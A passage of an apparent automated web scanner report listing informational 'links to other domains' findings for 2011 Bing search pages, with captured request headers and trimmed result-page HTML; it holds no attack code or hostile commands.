User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:05:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vFkMBaTcGD8SAPs8i8zGeZtRwsgzFwZCaKZ0ygpTmS2raju7BH-4dbYxvyzB0eezwMvT7AgWSgDl-lOus2-k3Jd2QQFKH2Nvbb3dmBjjQGcZ2VQ4ioByfcTxRsDNoHuoExqDSef-yhbz67-fbipjzLtyLdoOcZMmaEgDpMhUhcH9DeL-r9NgowadvlWrORMRCMU_K47BmHZu2yTVy0ZnlyRSRS-0X7eXv80Pv8zg6TOYRhokMeJAX9lktPD8uw3a0lweU2BBH1EezI0Iqrz9Rv3kB6QXcSRcXYUwc6ZSBnok1VAlMfZ9tOKLjtCqG8XrRj41a0BAmY3M9RjM9WsBLXeO95_tncsjxYDdRzf_YvQ5585U-4GOs9xc" onmousedown="return si_T('&amp;ID=FD,57.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://www.city-data.com/zips/02110.html" onmousedown="return si_T('&amp;ID=SERP,5044.1')"><strong>
...[SNIP]...
<h3><a href="http://www.neighborhoodlink.com/zip/02110" onmousedown="return si_T('&amp;ID=SERP,5062.1')"><strong>
...[SNIP]...
<h3><a href="http://www.brainyzip.com/zipcodes/02/02110.html" onmousedown="return si_T('&amp;ID=SERP,5079.1')"><strong>
...[SNIP]...
</cite>&nbsp;&#0183;&#32;<a href="http://cc.bingj.com/cache.aspx?q=Zip+Code+02110&amp;d=4800875966038697&amp;mkt=en-US&amp;setlang=en-US&amp;w=10d7539d,883f1261" onmousedown="return si_T('&amp;ID=SERP,5081.1')">Cached page</a>
...[SNIP]...
<h3><a href="http://www.helloboston.com/zip/boston_massachusetts_zip_code_02110.cfm" onmousedown="return si_T('&amp;ID=SERP,5097.1')"><strong>
...[SNIP]...
<h3><a href="http://www.zip-codes.com/zip-code/02110/zip-code-02110.asp" onmousedown="return si_T('&amp;ID=SERP,5117.1')"><strong>
...[SNIP]...
<h3><a href="http://www.apartmentreviews.net/zipcodes/massachusetts/boston-02110.htm" onmousedown="return si_T('&amp;ID=SERP,5145.1')">Search for Apartments in <strong>
...[SNIP]...
<h3><a href="http://www.mapszipcode.com/massachusetts/boston/02110" onmousedown="return si_T('&amp;ID=SERP,5163.1')"><strong>
...[SNIP]...
<h3><a href="http://www.hotelplanner.com/zip/Boston-MA-hotels-in-02110" onmousedown="return si_T('&amp;ID=SERP,5183.1')">Hotels in <strong>
...[SNIP]...
<h3><a href="http://www.payphone-project.com/mailboxes/zip_codes/0/02110.html" onmousedown="return si_T('&amp;ID=SERP,5202.1')">USPS <strong>
...[SNIP]...
<h3><a href="http://www.area-codes.com/zip-code/zip-code-02110.asp" onmousedown="return si_T('&amp;ID=SERP,5222.1')">BOSTON,MA, <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vFkMBaTcGD8SAPs8i8zGeZtRwsgzFwZCaKZ0ygpTmS2raju7BH-4dbYxvyzB0eezwMvT7AgWSgDl-lOus2-k3Jd2QQFKH2Nvbb3dmBjjQGcZ2VQ4ioByfcTxRsDNoHuoExqDSef-yhbz67-fbipjzLtyLdoOcZMmaEgDpMhUhcH9DeL-r9NgowadvlWrORMRCMU_K47BmHZu2yTVy0ZnlyRSRS-0X7eXv80Pv8zg6TOYRhokMeJAX9lktPD8uw3a0lweU2BBH1EezI0Iqrz9Rv3kB6QXcSRcXYUwc6ZSBnok1VAlMfZ9tOKLjtCqG8XrRj41a0BAmY3M9RjM9WsBLXeO95_tncsjxYDdRzf_YvQ5585U-4GOs9xc" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,77.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,79.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,81.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,83.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,85.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,87.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=Zip+Code+02110&amp;P3=ecalgobadge2&amp;P4=R5FD1&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dZip+Code+02110%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,89.1')">Tell us what you think</a>
...[SNIP]...

3.9. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=NCAA+tournament&FORM=Z9LH9 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915; RMS=F=Oi&A=SAAGAAAAAAAQ

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4votYiG2NVUjy71KIQXO9sYF9xwOYDT6FiYbOCx8ZgGH72NFh8fXTSpBmVpJx8kvT-Bq0HF_2-cnc5_mHg-YjRXcdppDsLcLBRpvEA0DQmJbVsCzv7et-2r09o60AqfsurQMRIQhd_MZ7e13XDhp_0r8a_PspARMdZiH-WUPny_9RMEZ438bO7Mn9pYitUjobe5Qd3K4zOTZCgahgU1arlwCKqaX_sMWGjQKrvuarje5gk7-9SMo4XEZqOAMsaVMUgCCDuXmIZbWothNFU9OVb6JhPPyWKergRG4LB3JwtHOL_toigoJRtP4fuUV3jBD0lc_VV_ZzF9-cG1UU1wT57acwCDfi0BuwC0EU-AoGcFzo1VAlMsmV8PKT9oy3X1nX2iQXGcRAmY3M9uy-sMQVqIqiIQhjHdJtoMkkkQrTsmg2noMfowmmqE50" onmousedown="return si_T('&amp;ID=FD,57.1,Ads')">For everything Basketball</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/collegebasketball/scores?form=sweetsixteen" class="entry-title" rel="bookmark" onmousedown="return si_T('&amp;ID=SERP,5585.1')">Elite Eight Pairings to be Set Tonight</a>
...[SNIP]...
<div class="ans_msnmm"><a href="http://msn.foxsports.com/collegebasketball/scores?form=sweetsixteen" onmousedown="return si_T('&amp;ID=SERP,5585.2')"><img title="Image: North Carolina forward Harrison Barnes (.. Chuck Burton/AP)" width="230" height="162" src="/caption/image?bn=RTImage&amp;bid=g5KWZBoLb7zjDA"/>
...[SNIP]...
<h5><a href="http://msn.foxsports.com/collegebasketball/scores?form=eliteeight" onmousedown="return si_T('&amp;ID=SERP,5587.1')">Live: NCAA Tournament scoreboard</a>
...[SNIP]...
<h5><a href="http://msn.foxsports.com/collegebasketball/story/NCAA-tournament-Duke-Blue-Devils-at-a-loss-for-words-after-loss-032411" onmousedown="return si_T('&amp;ID=SERP,5588.1')">Duke at a loss after falling to Arizona</a>
...[SNIP]...
<h5><a href="http://msn.foxsports.com/collegebasketball/story/Education-important-to-VCU-coach-Shaka-Smart-032511" onmousedown="return si_T('&amp;ID=SERP,5589.1')">VCU's Smart no ordinary coach</a>
...[SNIP]...
<h5><a href="http://www.nydailynews.com/blogs/weiss/2011/03/ncaa-tournament-five-things-that-will-happen-saturday-0" onmousedown="return si_T('&amp;ID=SERP,5466.1')"><strong>
...[SNIP]...
<h5><a href="http://bleacherreport.com/articles/645653-ncaa-sweet-16-scores-and-analysis-along-the-road-to-the-final-four/entry/56458-ncaa-tournament-2011-do-the-vcu-rams-have-another-upset-in-them-vs-florida-st" onmousedown="return si_T('&amp;ID=SERP,5469.1')"><strong>
...[SNIP]...
<h5><a href="http://www.oregonlive.com/collegebasketball/index.ssf/2011/03/former_franklin_star_shoni_sch.html" onmousedown="return si_T('&amp;ID=SERP,5471.1')">Former Franklin star Shoni Schimmel tries to lead Louisville deeper into <strong>
...[SNIP]...
<h3><a href="http://www.ncaa.com/sports/basketball-men/d1" onmousedown="return si_T('&amp;ID=SERP,5068.1')">Men's Basketball Division I - <strong>
...[SNIP]...
<h3><a href="http://www.ncaa.com/" onmousedown="return si_T('&amp;ID=SERP,5114.1')"><strong>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/NCAA_Men%27s_Division_I_Basketball_Championship" onmousedown="return si_T('&amp;ID=SERP,5182.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/NCAA_Men%27s_Division_I_Basketball_Championship#Tournament" onmousedown="return si_T('&amp;ID=SERP,5157.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/NCAA_Men%27s_Division_I_Basketball_Championship#Format_history" onmousedown="return si_T('&amp;ID=SERP,5158.1')">Format history</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/NCAA_Men%27s_Division_I_Basketball_Championship#March_Madness_and_history_of_the_term" onmousedown="return si_T('&amp;ID=SERP,5159.1')">March Madness and ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/NCAA_Men%27s_Division_I_Basketball_Championship#Championship_trophies_and_other_honors" onmousedown="return si_T('&amp;ID=SERP,5160.1')">Championship trophies ...</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/cbk" onmousedown="return si_T('&amp;ID=SERP,5480.1')">NCAA Div I Men's Basketball Tournament</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103250443" onmousedown="return si_T('&amp;ID=SERP,5481.1')">Kentucky at Ohio State</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103250413" onmousedown="return si_T('&amp;ID=SERP,5482.1')">Marquette at North Carolina</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103250287" onmousedown="return si_T('&amp;ID=SERP,5483.1')">Richmond at Kansas</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103250213" onmousedown="return si_T('&amp;ID=SERP,5484.1')">Virginia Commonwealth at Florida State</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103260129" onmousedown="return si_T('&amp;ID=SERP,5485.1')">Arizona at Connecticut</a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/cbk/gameTrax?gameId=201103260210" onmousedown="return si_T('&amp;ID=SERP,5486.1')">Butler at Florida</a>
...[SNIP]...
<span class='sc_f2'><a href="http://msn.foxsports.com/cbk" onmousedown="return si_T('&amp;ID=SERP,5487.1')">Tournament Info</a>
...[SNIP]...
<span class='sc_f2'><a href="http://msn.foxsports.com/collegebasketball/page/2011-NCAA-Basketball-Tournament-Bracket-Central" onmousedown="return si_T('&amp;ID=SERP,5488.1')">Bracket</a>
...[SNIP]...
<span class='sc_f2'><a href="http://msn.foxsports.com" onmousedown="return si_T('&amp;ID=SERP,5489.1')">FOX Sports on MSN</a>
...[SNIP]...
<h3><a href="http://tournament.fantasysports.yahoo.com/t1" onmousedown="return si_T('&amp;ID=SERP,5232.1')">College Basketball <strong>
...[SNIP]...
<h3><a href="http://espn.go.com/mens-college-basketball/tournament" onmousedown="return si_T('&amp;ID=SERP,5286.1')">2011 <strong>
...[SNIP]...
<h3><a href="http://www.csmonitor.com/USA/Sports/2011/0324/NCAA-tournament-Sweet-16-preview-Butler-and-Wisconsin-are-steady-like-their-coaches" onmousedown="return si_T('&amp;ID=SERP,5307.1')"><strong>
...[SNIP]...
<h3><a href="http://www.wbaltv.com/news/27223497/detail.html" onmousedown="return si_T('&amp;ID=SERP,5326.1')"><strong>
...[SNIP]...
<h3><a href="http://rivals.yahoo.com/ncaa/basketball" onmousedown="return si_T('&amp;ID=SERP,5378.1')">College Basketball on Rivals.com - <strong>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/2010_NCAA_Men%27s_Division_I_Basketball_Tournament" onmousedown="return si_T('&amp;ID=SERP,5420.1')">2010 <strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/2010_NCAA_Men%27s_Division_I_Basketball_Tournament#Tournament_procedure" onmousedown="return si_T('&amp;ID=SERP,5395.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/2010_NCAA_Men%27s_Division_I_Basketball_Tournament#Qualifying_teams" onmousedown="return si_T('&amp;ID=SERP,5396.1')">Qualifying teams</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/2010_NCAA_Men%27s_Division_I_Basketball_Tournament#Brackets" onmousedown="return si_T('&amp;ID=SERP,5397.1')">Brackets</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/2010_NCAA_Men%27s_Division_I_Basketball_Tournament#Game_summaries" onmousedown="return si_T('&amp;ID=SERP,5398.1')">Game summaries</a>
...[SNIP]...
<h3><a href="http://www.csmonitor.com/USA/Sports/2011/0325/NCAA-tournament-Sweet-16-Who-s-complaining-about-VCU-now" onmousedown="return si_T('&amp;ID=SERP,5441.1')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4votYiG2NVUjy71KIQXO9sYF9xwOYDT6FiYbOCx8ZgGH72NFh8fXTSpBmVpJx8kvT-Bq0HF_2-cnc5_mHg-YjRXcdppDsLcLBRpvEA0DQmJbVsCzv7et-2r09o60AqfsurQMRIQhd_MZ7e13XDhp_0r8a_PspARMdZiH-WUPny_9RMEZ438bO7Mn9pYitUjobe5Qd3K4zOTZCgahgU1arlwCKqaX_sMWGjQKrvuarje5gk7-9SMo4XEZqOAMsaVMUgCCDuXmIZbWothNFU9OVb6JhPPyWKergRG4LB3JwtHOL_toigoJRtP4fuUV3jBD0lc_VV_ZzF9-cG1UU1wT57acwCDfi0BuwC0EU-AoGcFzo1VAlMsmV8PKT9oy3X1nX2iQXGcRAmY3M9uy-sMQVqIqiIQhjHdJtoMkkkQrTsmg2noMfowmmqE50" onmousedown="return si_T('&amp;ID=FD,61.1,Ads')">For everything Basketball</a>
...[SNIP]...
<h3><a href="http://930445.r.msn.com/?ld=4vpy7yP6A5Z2R_z2Amgpn--5NPdzT1m83RJOqc4k6lDezQj0lAHxkqzo_782Li1dElBMpiBxui5hfhri0fiMpYIF8dZ5YAQr5bOf2JTG1_Q8Bl_zmLqrggjSynjU9GCsxuhmcoHmAaPl6Gh5NebMsIRIPyVTG8a4ZnTKdwXYpMAvXx7x4IG40Vhxub84nGyvgkRvr11O0Ft_bD5ySQVcYhDi-S53WBZk4Eur8hSgNAz_o1VAlMjy4SPp4okOaMOndmHZWbVBAmY3M9efDJetREnYzchDTCieDhIapF1cp1CBvJBeOG9YB8YcI" onmousedown="return si_T('&amp;ID=FD,65.1,Ads')">Free <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vBaZwhO_mdjdP3kBpAX1h5Z8SV1iAwcgSnZH0P4vy-DL3H2NfZpF9BW8Xsbi2Zm91b9_AAGTSQNzdjDfVqSCf_V2QCKhLOVLbGFfOXS0ZvmisOJprtjdIlMnresTVUvG5cvnn3HYg3K4_mVeyVVqdiKdrR3m6c3qu3zAfRxt224UaSGWh9doqv42f83fNPltJat0m5sVKJPxj6ZnJiubaHkB9eBiNbrRcRtZAahxJyZWHIsWj8RXDxn902_AYqjfmPDy7_mzbDevr58OzZR64Bde0NdeMxfu6jKfrJpY4nkeXjbU22q8csmsaMUHJnmZbnAvuAnPsdi4_6bIqYFWqv8b2bLpHv8SAyXn_Wy86iAW-A8d7AaWEy42qVymFyAOWNVQJTEn4VJQA8-huvoAuwflQQwcQJmNzPQmZQi0HOODj_15Xx2oARQeuipQ_XAkeVOYqM3RqC42j" onmousedown="return si_T('&amp;ID=FD,67.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://946780.r.msn.com/?ld=4vmwuORVz8yhN6CWAQy8R5rxz67KRAfg2nXgb88N-KtQXX3GnqlIwf0lGyYHdnLbYjaJbaxBjx_JkayLXezfNBdee9w3LSj07ZgvVn5NWDMg_Fh01WgzT4thxO9foGeSty44hqD4Psz50EC0mKCDpgqLsTrE6I_7yl67QpxjcBXW5huUnD9zCmvo0baxTwnFY89gegi2zVL_JvYg0ddLrfoY-Rdlis0bkKyMF54srnNlY_ZoWxNBEGG44ygCJZh8hcBxmKTQwvSBZQt_iga0c_0DVUCUz05TD19l_lELaVohB6ggxYECZjcz3y0atg_VNCr85rF2b9NfdkBF9ezfa4s0vLlx-Cle1MFg" onmousedown="return si_T('&amp;ID=FD,69.1,Ads')">Basketball Tourney Update</a>
...[SNIP]...
<h3><a href="http://7881.r.msn.com/?ld=4v7gi5yw1h3YCpXr0I3G0ZjOftqGJ_bj4vc-Y7Goi7E5WqFuIAmHl0nxohgfiG8KCTCCqeGIopZ-1ePAZnZrE_UnPTbHGHV9jDvXzuSeFmhFwSuYl8zi5hLSDRPP0UmpKkmZG0mtC9TLhZWIS2ber-I7hLTKbXBkbEkgvxLxwqJG567BmrxF1jVIHC4RUVPqeC_NCGKkv6eONKxHx9z1KRMTC6p5v8e7q1910k_1Lk5mYMVdCF8qx_uCLp-ijxmsAhD6I8NMWzwgNkVzZ6LM6zDhFbB5rDGblYAP0oRaInXqB4EXpnPgNMxtKG9PLQlUWxH4EV-Dd5ppPxWDEZs_QJazVUCUyAHori6MfviFpZBV9FB0cUECZjcz1pbmIi7n18lq9WhIJyeFeePUvWiyzsv21LPSjh4dUnCA" onmousedown="return si_T('&amp;ID=FD,71.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vuKUPXX1jsl82gi7FEeBDMHKVSaIWlxfcSzuGcW6W3HOX7ycW9WLwv4xZUF3YoYlWE7NYUuXzOqytFM64sNj8LV121g4ppcnvL0pteEHZvhl5aqOoTQ_f64UDYEH1JTMNqIu2MmRlfFfQjP4hczp5EmT2CJJ551ryka_m6qjiune4y63jgrpZcOJ7YPD7Rg0grXfaX6WrSNzouphBwdY3aDgmzkrZ_ZZ86JE9lCZMISARPwErfFRwiENUXhIMbuS1RAqVF0ynBxCCZqEXHOvudBwGqpYxi6-A-apJmART11k1VAlM5ZoHrboFu-xQc3dEEmL5ChAmY3M9P6mmWnDT6t4uK4PyT4jFMC0W2_e_nO5ClZFuvW5sPS0" onmousedown="return si_T('&amp;ID=FD,73.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,135.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,137.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,139.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,141.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,143.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,145.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=NCAA+tournament&amp;P3=ecalgobadge2&amp;P4=Z9LH9&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dNCAA+tournament%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,147.1')">Tell us what you think</a>
...[SNIP]...

3.10. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Weather+02110&FORM=R5FD2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:05:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 25655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="wt_pv"><a href="http://www.foreca.com/United_States/Massachusetts/Boston?tenday" onmousedown="return si_T('&amp;ID=SERP,5396.1')">Foreca</a>
...[SNIP]...
<div class="wt_pv"><a href="http://www.intellicast.com/Local/Forecast.aspx?location=USMA9964&amp;utm_content=USMA9964&amp;utm_campaign=wxbing&amp;utm_source=bing.com&amp;utm_medium=fcast" onmousedown="return si_T('&amp;ID=SERP,5398.1')">Intellicast</a>
...[SNIP]...
<div class="wt_pv"><a href="http://www.accuweather.com/product-links/bing-weather.aspx?type=forecast&amp;location=NAM|US|MA|North Waltham&amp;zipcode=02455&amp;cid=2258269" onmousedown="return si_T('&amp;ID=SERP,5399.1')">AccuWeather</a>
...[SNIP]...
<h3><a href="http://www.weather.com/weather/today/Boston+MA+02110" onmousedown="return si_T('&amp;ID=SERP,5053.1')"><strong>
...[SNIP]...
<h3><a href="http://www.wunderground.com/cgi-bin/findweather/getForecast?query=02110" onmousedown="return si_T('&amp;ID=SERP,5081.1')">Boston, Massachusetts (<strong>
...[SNIP]...
<h3><a href="http://www.sorabji.com/weather/us/02110.html" onmousedown="return si_T('&amp;ID=SERP,5109.1')">Boston Massachusetts <strong>
...[SNIP]...
<h3><a href="http://www.accuweather.com/us/ma/boston/02110/city-weather-forecast.asp" onmousedown="return si_T('&amp;ID=SERP,5137.1')">Boston <strong>
...[SNIP]...
<h3><a href="http://www1.whdh.com/weather/" onmousedown="return si_T('&amp;ID=SERP,5191.1')">WHDH 7NEWS NBC Boston <strong>
...[SNIP]...
<h3><a href="http://weather.weatherbug.com/MA/Boston-weather.html" onmousedown="return si_T('&amp;ID=SERP,5246.1')">Boston, MA <strong>
...[SNIP]...
<h3><a href="http://weather.weatherbug.com/MA/Boston-weather/local-forecast/7-day-forecast.html" onmousedown="return si_T('&amp;ID=SERP,5297.1')">Boston, MA 7 Day <strong>
...[SNIP]...
<h3><a href="http://weather.noaa.gov/weather/current/KBOS.html" onmousedown="return si_T('&amp;ID=SERP,5327.1')">Current</a>
...[SNIP]...
<h3><a href="http://weather.noaa.gov/pub/data/raw/fz/fzus51.kbox.srf.box.txt" onmousedown="return si_T('&amp;ID=SERP,5346.1')"><strong>
...[SNIP]...
<h3><a href="http://www.rususa.com/weather/current.asp-zip-02110" onmousedown="return si_T('&amp;ID=SERP,5374.1')"><strong>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,79.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,81.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,83.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,85.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,87.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,89.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=Weather+02110&amp;P3=ecalgobadge2&amp;P4=R5FD2&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dWeather+02110%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,91.1')">Tell us what you think</a>
...[SNIP]...

3.11. http://www.bing.com/settings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

